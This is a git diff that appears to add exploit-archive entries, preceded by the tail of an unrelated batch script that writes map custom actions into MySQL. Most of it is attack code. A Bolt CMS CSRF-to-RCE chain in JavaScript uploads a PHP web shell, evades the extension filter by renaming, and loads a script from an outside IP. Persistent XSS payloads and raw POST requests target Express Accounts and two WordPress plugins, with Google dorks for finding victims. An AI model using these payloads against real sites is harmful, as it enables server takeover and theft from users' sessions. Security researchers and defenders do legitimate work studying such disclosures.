+for /F "tokens=1,* delims==" %%k in (conf\settings.txt) do (
+  if not "%%k"=="#=" set %%k=%%l
+)
+
+if "%APACHE_USE_SSL%"=="TRUE" (
+  set DEFAULT_HTTP_PROTOCOL=https
+  set APACHE_USE_SSL_VALUE=true
+  set DEFAULT_HTTP_PORT=%APACHE_HTTPS_PORT%
+) else (
+  set DEFAULT_HTTP_PROTOCOL=http
+  set APACHE_USE_SSL_VALUE=false
+  set DEFAULT_HTTP_PORT=%APACHE_HTTP_PORT%
+)
+
+goto GLOBAL
+
+
+
+rem
+rem good to go in a non interractive mode
+rem the following is the generic par of the install, whatever we are in static or dynamic mode
+rem
+:GLOBAL
+if "%DEBUGMAPSCRIPT%"=="TRUE" echo Global section
+
+set MYSQL="MYSQL\MySQL Server 5.6 MariaDB\bin\mysql.exe"
+
+echo delete from %ACCOUNT%.asp_custom_action where CA_CAPTION in ('Show on map','Closest')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+echo delete from %ACCOUNT%.asp_custom_tab where NAME='Map'> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+set INSERTFIELDS=%ACCOUNT%.asp_custom_action (CA_CAPTION,CA_VIEW,CA_MODE,CA_LIST_MODE,CA_HEIGHT,CA_WIDTH,CA_RESIZABLE,CA_NEED_REFRESH,CA_PROFILES,CA_URL,CA_CUSTOM_TAB,CA_TRIGGER_MODE)
+
+if "%STATIC%"=="YES" goto :STATIC
+goto :DYNAMIC
+
+
+
+:STATIC
+
+if "%DEBUGMAPSCRIPT%"=="TRUE" echo Static section
+
+echo map=static > ACCOUNTS\%ACCOUNT%\config.txt
+
+echo ^<?php $staticMap=true; ?^>>APACHE\htdocs\osm\mode.php
+
+echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+echo insert into %INSERTFIELDS% values ('Journey on map','workerView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+if exist req.sql del req.sql
+goto FINAL
+
+
+:DYNAMIC
+
+if "%DEBUGMAPSCRIPT%"=="TRUE" echo Dynamic section
+
+echo map=dynamic > ACCOUNTS\%ACCOUNT%\config.txt
+
+echo ^<?php $staticMap=false; ?^>>APACHE\htdocs\osm\mode.php
+
+echo insert into %INSERTFIELDS% values ('Show on map','jobList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+echo insert into %INSERTFIELDS% values ('Show on map','jobView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+echo insert into %INSERTFIELDS% values ('Closest','jobList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+echo insert into %INSERTFIELDS% values ('Closest','jobView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+echo insert into %INSERTFIELDS% values ('Show on map','workerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+echo insert into %INSERTFIELDS% values ('Show on map','workerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','mandatory',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
+rem %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+echo insert into %INSERTFIELDS% values ('Show on map','customerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+echo insert into %INSERTFIELDS% values ('Show on map','customerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+echo insert into %INSERTFIELDS% values ('Show on map','planning','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+
+set INSERTFIELDS=%ACCOUNT%.asp_custom_tab (NAME,POSITION,ADMIN,URL,WIDTH,HEIGHT)
+
+echo insert into %INSERTFIELDS% values ('Map',0,'false','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%','100%%','100%%')> req.sql
+%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
+
+if exist req.sql del req.sql
+goto FINAL
+
+
+:FINAL
+echo Map registred for %ACCOUNT%
+if "%1"=="" pause
+goto :EOF
\ No newline at end of file
diff --git a/exploits/php/webapps/47501.txt b/exploits/php/webapps/47501.txt
new file mode 100644
index 000000000..5aff86b3f
--- /dev/null
+++ b/exploits/php/webapps/47501.txt
@@ -0,0 +1,368 @@
+# Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery
+# Date: 2019-10-15
+# Exploit Author: r3m0t3nu11[Zero-Way]
+# Vendor Homepage: https://bolt.cm/
+# Software Link: https://bolt.cm/
+# Version: up to date and 6.5
+# Tested on: Linux
+# CVE : CVE-2019-1759
+
+# last version
+
+# Csrf p0c
+<html>
+  <body>
+  <head>
+Bolt v 3.x exploit 0day
+</head>
+<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>
+<img src ="
+https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">
+
+<script>
+      function submitRequest()
+      {
+        Csrf = async () => {
+        const xhr = new XMLHttpRequest();
+        xhr.open("POST",
+"http:\/\/127.0.0.1\/index.php\/async\/folder\/create",
+true);
+        xhr.setRequestHeader("Accept", "*\/*");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type",
+"application\/x-www-form-urlencoded; charset=UTF-8");
+        xhr.withCredentials = true;
+        var body = "parent=&foldername=sss&namespace=files";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+          xhr.send(new Blob([aBody]));
+        xhr.onreadystatechange = async (e) => {
+        if (xhr.readyState === 4 && xhr.status === 200){
+
+};
+ JSfuck1();
+}
+
+}
+      JSfuck1 = async () => {
+const xhr = new XMLHttpRequest();
+xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/create",
+true);
+xhr.setRequestHeader("Accept", "*\/*");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
+charset=UTF-8");
+xhr.withCredentials = true;
+var body1 = "filename=aaa&parentPath=sss&namespace=files";
+xhr.send(body1);
+xhr.onreadystatechange = async (e) => {
+if (xhr.readyState === 4 && xhr.status === 200){
+
+}
+
+
+};
+where();
+      }
+
+      where = async () => {
+const xhr = new XMLHttpRequest();
+xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/rename",
+true);
+xhr.setRequestHeader("Accept", "*\/*");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
+charset=UTF-8");
+xhr.withCredentials = true;
+var body2 =
+"namespace=files&parent=sss&oldname=aaa&newname=aaa%3Cscript+src%3D'http%3A%26%23x2f%3B%26%23x2f%3B45.63.42.245%26%23x2f%3Bfinal.js'%3C%26%23x2f%3Bscript%3E.jpg";
+xhr.send(body2);
+
+}
+          Csrf();
+      }
+</script>
+    <form action="#">
+      <input type="button" value="Submit request"
+onclick="submitRequest();" />
+    </form>
+  </body>
+</html>
+
+JS p0c
+
+<script>
+Token = async () => {
+var xhr = new XMLHttpRequest();
+xhr.open("GET", "\/index.php\/bolt\/files", true);
+xhr.responseType = "document";
+xhr.withCredentials=true;
+xhr.onreadystatechange = async (e) => {
+if (xhr.readyState === 4 && xhr.status === 200){
+doc = xhr.response;
+token = doc.getElementsByName("file_upload[_token]")[0].value;
+upload(token);
+console.log(token);
+
+}
+};
+xhr.send();
+}
+
+
+
+upload = async (csrfToken) =>{
+var body =
+"-----------------------------190530466613268610451083392867\r\n" +
+         "Content-Disposition: form-data; name=\"file_upload[select][]\";
+filename=\"r3m0t3nu11.txt\"\r\n" +
+          "Content-Type: text/plain\r\n" +
+          "\r\n" +
+          "<?php system($_GET['test']);?>\r\n" +
+          "-----------------------------190530466613268610451083392867\r\n"
++
+          "Content-Disposition: form-data;
+name=\"file_upload[upload]\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------190530466613268610451083392867\r\n"
++
+          "Content-Disposition: form-data;
+name=\"file_upload[_token]\"\r\n" +
+          "\r\n" +
+          token
+
+"-----------------------------190530466613268610451083392867--\r\n";
+
+const xhr = new XMLHttpRequest();
+xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/bolt\/files", true);
+xhr.setRequestHeader("Accept",
+"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "multipart\/form-data;
+boundary=---------------------------190530466613268610451083392867");
+xhr.withCredentials = true;
+ xhr.onreadystatechange = async (e) => {
+if (xhr.readyState === 4 && xhr.status === 200){
+  Shell();
+}
+
+};
+
+ var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+
+}
+
+
+Shell = async () => {
+const xhr = new XMLHttpRequest();
+xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/file/rename", true);
+xhr.setRequestHeader("Accept", "*\/*");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
+charset=UTF-8");
+xhr.withCredentials = true;
+xhr.timeout = 4000;
+var body1 =
+"namespace=files&parent=&oldname=r3m0t3nu11.txt&newname=dd%2Fphp-exif-systemasjpg%2Faa%2Fphp-exif-system.php%2Faaa.jpg";
+xhr.send(body1);
+bypass();
+}
+
+bypass = async () => {
+const xhr = new XMLHttpRequest();
+xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);
+xhr.setRequestHeader("Accept", "*\/*");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
+charset=UTF-8");
+xhr.withCredentials = true;
+xhr.timeout = 4000;
+var body1 =
+"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/php-exif-system.php%2f&oldname=aaa.jpg&newname=bypass.php";
+xhr.send(body1);
+bypass2();
+}
+
+bypass2 = async () => {
+const xhr = new XMLHttpRequest();
+xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);
+xhr.setRequestHeader("Accept", "*\/*");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
+charset=UTF-8");
+xhr.withCredentials = true;
+xhr.timeout = 4000;
+var body1 =
+"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/&oldname=php-exif-system.php&newname=bypass1";
+xhr.send(body1);
+
+}
+
+
+
+Token();
+</script>
+
+
+version 6.5
+
+CSrf p0c
+<html>
+  <body>
+<head>
+Bolt v 3.x CVE-2019-17591 exploit
+</head>
+<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>
+<img src ="
+https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">
+
+<script>
+      function submitRequest()
+      {
+        Csrf = async () => {
+        const xhr = new XMLHttpRequest();
+        xhr.open("POST",
+"http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/create",
+true);
+        xhr.setRequestHeader("Accept", "*\/*");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type",
+"application\/x-www-form-urlencoded; charset=UTF-8");
+        xhr.withCredentials = true;
+        var body = "filename=test&parentPath=&namespace=files";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+          xhr.send(new Blob([aBody]));
+        xhr.onreadystatechange = async (e) => {
+        if (xhr.readyState === 4 && xhr.status === 200){
+          JSfuck();
+}
+};
+
+
+}
+      JSfuck = async () => {
+const xhr = new XMLHttpRequest();
+xhr.open("POST",
+"http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/rename",
+true);
+xhr.setRequestHeader("Accept", "*\/*");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
+charset=UTF-8");
+xhr.withCredentials = true;
+var body1 = "namespace=files&parent=&oldname=test&newname=<img src='x'
+onerror=alert(1)>";
+xhr.send(body1);
+
+}
+          Csrf();
+      }
+</script>
+    <form action="#">
+      <input type="button" value="Submit request"
+onclick="submitRequest();" />
+    </form>
+  </body>
+</html>
+
+Js p0c
+
+
+<script>
+Token = async () => {
+var xhr = new XMLHttpRequest();
+xhr.open("GET", "\/bolt\/files", true);
+xhr.responseType = "document";
+xhr.withCredentials=true;
+xhr.onreadystatechange = async (e) => {
+if (xhr.readyState === 4 && xhr.status === 200){
+doc = xhr.response;
+token = doc.getElementsByName("file_upload[_token]")[0].value;
+upload(token);
+console.log(token);
+
+}
+
+
+}
+xhr.send(null);
+}
+
+
+
+upload = async (csrfToken) =>{
+var body =
+"-----------------------------190530466613268610451083392867\r\n" +
+         "Content-Disposition: form-data; name=\"file_upload[select][]\";
+filename=\"r3m0t3nu11.txt\"\r\n" +
+          "Content-Type: text/plain\r\n" +
+          "\r\n" +
+          "<?php system($_GET['test']);?>\r\n" +
+          "-----------------------------190530466613268610451083392867\r\n"
++
+          "Content-Disposition: form-data;
+name=\"file_upload[upload]\"\r\n" +
+          "\r\n" +
+          "\r\n" +
+          "-----------------------------190530466613268610451083392867\r\n"
++
+          "Content-Disposition: form-data;
+name=\"file_upload[_token]\"\r\n" +
+          "\r\n" +
+          token
+
+"-----------------------------190530466613268610451083392867--\r\n";
+
+const xhr = new XMLHttpRequest();
+xhr.open("POST", "http:\/\/127.0.0.1\/bolt\/files", true);
+xhr.setRequestHeader("Accept",
+"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "multipart\/form-data;
+boundary=---------------------------190530466613268610451083392867");
+xhr.withCredentials = true;
+xhr.onreadystatechange = async (e) => {
+if (xhr.readyState === 4 && xhr.status === 200){
+Shell();
+}
+};
+      var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+}
+
+
+
+
+Shell = async () => {
+const xhr = new XMLHttpRequest();
+xhr.open("POST", "http:\/\/127.0.0.1/\/async\/file\/rename", true);
+xhr.setRequestHeader("Accept", "*\/*");
+xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded;
+charset=UTF-8");
+xhr.withCredentials = true;
+var body1 =
+"namespace=files&parent=%2f&oldname=r3m0t3nu11.txt&newname=b.php";
+xhr.send(body1);
+}
+Token();
+</script>
+
+proof of concept :
+
+https://drive.google.com/file/d/1TRjzOM-q8cWK1JA9cN1Auhp7Ao3AXtbp/view?usp=sharing
+
+https://drive.google.com/file/d/1QSE7Dnx0XZth9WciaohjhA6nk_-9jCr1/view?usp=sharing
+
+Greetz to :
+Samir-dz,YokO,0n3,Mr_Hex,syfi2k,Q8Librarian,Dr_hEx,dracula1337,z0mbi3_h4ck3r,Red
+Virus,m7md1337,D3vil1337,and all my friends
\ No newline at end of file
diff --git a/exploits/php/webapps/47505.txt b/exploits/php/webapps/47505.txt
new file mode 100644
index 000000000..2312093f8
--- /dev/null
+++ b/exploits/php/webapps/47505.txt
@@ -0,0 +1,62 @@
+# Exploit Title: Express Accounts Accounting 7.02 - Persistent Cross-Site Scripting
+# Exploit Author: Debashis Pal
+# Date: 2019-10-16
+# Vendor Homepage: https://www.nchsoftware.com 
+# Source: https://www.nchsoftware.com/accounting/index.html
+# Version: Express Accounts Accounting v7.02
+# CVE : N/A
+# Tested on: Windows 7 SP1(32bit)
+
+# About Express Accounts Accounting v7.02
+=========================================
+Express Accounts is professional business accounting software, perfect for small businesses. 
+
+# Vulnerability 
+================
+Persistent Cross site scripting (XSS).
+
+# PoC 
+======
+
+1. Login as authenticated unprivileged user to Express Accounts Accounting v7.02 web enable service i.e  http://A.B.C.D:98 [Default installation]. 
+2. Under "Invoices" , Invoices List -> View Invoices -> Add New Invoice -> Customer: Field put </script><script>alert('XSS');</script>
+Save the change. 
+
+or 
+
+Under "Sales Orders" 
+Sales Orders -> view Orders ->  Add New Order -> New Sales Order ->Customer: Field put </script><script>alert('XSS');</script>
+Save the change. 
+
+or 
+
+Under "Items" 
+Items -> Add new item-> Item field: put  </script><script>alert('XSS');</script>
+Save the change. 
+
+or 
+
+Under "Customers" 
+Customers -> Add New Customer -> Customer Name:  put  </script><script>alert('XSS');</script>
+Save the change. 
+
+or 
+
+Under "Quotes"
+Quotes -> View Quotes -> Add New Quote -> Customer: put  </script><script>alert('XSS');</script>
+Save the change. 
+
+3. Login in authenticated privileged or unprivileged user to Express Accounts v7.02 web enable service and visit any of Invoices/Sales Orders/Items/Customers/Quotes section, Persistent XSS payload will execute.
+
+# Disclosure Timeline
+======================
+Vulnerability Discover Date: 15-Sep-2019.
+Vulnerability notification to vendor via vendor provided web form: 15-Sep-2019, 19-Sep-2019, 26-Sep-2019, no responds. 
+Submit exploit-db : 16-Oct-2019.
+
+
+# Disclaimer
+=============
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
+The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
\ No newline at end of file
diff --git a/exploits/php/webapps/47516.txt b/exploits/php/webapps/47516.txt
new file mode 100644
index 000000000..07d30f19c
--- /dev/null
+++ b/exploits/php/webapps/47516.txt
@@ -0,0 +1,44 @@
+# Exploit Title: Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting
+# Google Dork: inurl:"\wp-content\plugins\foogallery"
+# Date: 2019-06-13
+# Exploit Author: Unk9vvN
+# Vendor Homepage: https://foo.gallery/
+# Software Link: https://wordpress.org/plugins/foogallery/
+# Version: 1.8.12
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+# Description
+# This vulnerability is in the validation mode and is located in the plugin settings panel and the vulnerability type is stored ,it happend becuse in setting is an select tag ,this select tag have option with value of title gallerys so simply we just have to break option and write our script tag
+the vulnerability parameters are as follows.
+
+1.Go to the 'add Gallery' of FooGallery
+2.Enter the payload in the "add Title"
+3.Click the "Publish" option
+4.Go to plugin setting of FooGallery
+5.Your payload will run
+
+
+# URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=foogallery&wp-post-new-reload=true
+# Parameter & Payoad: post_title="/><script>alert("Unk9vvn")</script>
+
+
+#
+# POC
+#
+POST /wordpress/wp-admin/post.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=foogallery&wp-post-new-reload=true
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 2694
+Cookie: ......
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+_wpnonce=933471aa43&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dfoogallery&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=foogallery&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Dfoogallery%26ids%3D31&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Dfoogallery%26ids%3D31&auto_draft=&post_ID=32&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvn%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=14&mn=42&ss=45&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=14&cur_hh=14&hidden_mn=42&cur_mn=42&original_publish=Publish&publish=Publish&foogallery_sort=&foogallery_clear_gallery_thumb_cache_nonce=e18d32a542&_thumbnail_id=-1&_foogallery_settings%5Bfoogallery_items_view%5D=manage&foogallery_nonce=b6066e6407&foogallery_attachments=&foogallery_preview=e35a011572&foogallery_template=default&_foogallery_settings%5Bdefault_thumbnail_dimensions%5D%5Bwidth%5D=150&_foogallery_settings%5Bdefault_thumbnail_dimensions%5D%5Bheight%5D=150&_foogallery_settings%5Bdefault_thumbnail_link%5D=image&_foogallery_settings%5Bdefault_lightbox%5D=none&_foogallery_settings%5Bdefault_spacing%5D=fg-gutter-10&_foogallery_settings%5Bdefault_alignment%5D=fg-center&_foogallery_settings%5Bdefault_theme%5D=fg-light&_foogallery_settings%5Bdefault_border_size%5D=fg-border-thin&_foogallery_settings%5Bdefault_rounded_corners%5D=&_foogallery_settings%5Bdefault_drop_shadow%5D=fg-shadow-outline&_foogallery_settings%5Bdefault_inner_shadow%5D=&_foogallery_settings%5Bdefault_loading_icon%5D=fg-loading-default&_foogallery_settings%5Bdefault_loaded_effect%5D=fg-loaded-fade-in&_foogallery_settings%5Bdefault_hover_effect_color%5D=&_foogallery_settings%5Bdefault_hover_effect_scale%5D=&_foogallery_settings%5Bdefault_hover_effect_caption_visibility%5D=fg-caption-hover&_foogallery_settings%5Bdefault_hover_effect_transition%5D=fg-hover-fade&_foogallery_settings%5Bdefault_hover_effect_icon%5D=fg-hover-zoom&_foogallery_settings%5Bdefault_caption_title_source%5D=&_foogallery_settings%5Bdefault_caption_desc_source%5D=&_foogallery_settings%5Bdefault_captions_limit_length%5D=&_foogallery_settings%5Bdefault_paging_type%5D=&_foogallery_settings%5Bdefault_custom_settings%5D=&_foogallery_settings%5Bdefault_custom_attributes%5D=&_foogallery_settings%5Bdefault_lazyload%5D=&post_name=&foogallery_custom_css=
\ No newline at end of file
diff --git a/exploits/php/webapps/47517.txt b/exploits/php/webapps/47517.txt
new file mode 100644
index 000000000..b02626848
--- /dev/null
+++ b/exploits/php/webapps/47517.txt
@@ -0,0 +1,44 @@
+# Exploit Title: Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting
+# Google Dork: inurl:"\wp-content\plugins\soliloquy-lite"
+# Date: 2019-06-13
+# Exploit Author: Unk9vvN
+# Vendor Homepage: https://soliloquywp.com/
+# Software Link: https://wordpress.org/plugins/soliloquy-lite/
+# Version: 2.5.6
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+# Description
+# This vulnerability is in the validation mode and is located in the Prevew of new post inside soliloquy and the vulnerability type is stored ,it happend when a user insert script tag in title input then save the post. everything will be ok until target click on preview of vulnerabil.
+
+1.Go to the 'Add new' section of soliloquy
+2.Enter the payload in the "add Title"
+3.Select a sample image
+4.Click the "Publish" option
+5.Click on Preview
+6.Your payload will run
+
+
+# URI: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit
+# Parameter & Payoad: post_title=&#47;"><script>alert("Unk9vvN")<&#47;script>
+
+
+#
+# POC
+#
+POST /wordpress/wp-admin/post.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1599
+Cookie: .......
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+_wpnonce=d9f78b76e2&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=soliloquy&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&post_ID=50&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvN%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&_soliloquy%5Btype%5D=default&async-upload=&post_id=50&soliloquy=bdfd10296c&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&_soliloquy%5Btype_default%5D=1&_soliloquy%5Bslider_theme%5D=base&_soliloquy%5Bslider_width%5D=960&_soliloquy%5Bslider_height%5D=300&_soliloquy%5Btransition%5D=fade&_soliloquy%5Bduration%5D=5000&_soliloquy%5Bspeed%5D=400&_soliloquy%5Bgutter%5D=20&_soliloquy%5Bslider%5D=1&_soliloquy%5Baria_live%5D=polite&_soliloquy%5Btitle%5D=%2F%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&_soliloquy%5Bslug%5D=scriptalert1script&_soliloquy%5Bclasses%5D=&wp-preview=dopreview&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=21&ss=21&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=21&cur_mn=21&original_publish=Update
\ No newline at end of file
diff --git a/exploits/php/webapps/47518.txt b/exploits/php/webapps/47518.txt
new file mode 100644
index 000000000..a294da397
--- /dev/null
+++ b/exploits/php/webapps/47518.txt
@@ -0,0 +1,44 @@
